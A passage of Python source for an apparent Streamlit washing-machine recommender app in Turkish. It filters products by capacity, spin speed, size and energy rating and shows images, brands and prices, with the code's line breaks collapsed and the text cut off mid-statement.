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)](https://github.com/sarperyilm
az)") with col7: st.markdown("<b><i>Doğukan Doğru</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/do%C4%9Fukando%C4%9Fru/)") 
st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/dogudogru)
") elif machine =="Çamaşır Makinesi": with st.sidebar: capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 0-6 KG , Orta Kapasite: 7-10 KG, Yüksek Kapasite: 10+ KG'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) cycle_options = [' ',"Düşük Devir","Orta Devir","Yüksek Devir"] cycle_help = '''Düşük devir: 1000'e kadar, Orta devir: 1000 - 1200, Yüksek Kapasite: 1200+'''.strip(",") cycle = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin devir sayısı ne olmalı?',options=cycle_options,help=cycle_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) soru_list = [capacity,cycle,size,energy_usage] soru_list1 = ["capacity","cycle","size","energy_usage"] soru_list2 = [capacity,cycle,size,energy_usage] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data3 = data2.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf = dataf[dataf[len_lst1[k]] == len_lst2[k]] if len(dataf) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], 
stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) elif len(dataf) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) elif len(dataf) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf.brand[2]) st.title("Fiyat") st.title(dataf.price[2]) elif len(dataf) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf.sort_values(by="price", ascending=True).reset_index() fp1 = dataf[dataf["puan"] > dataf["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + 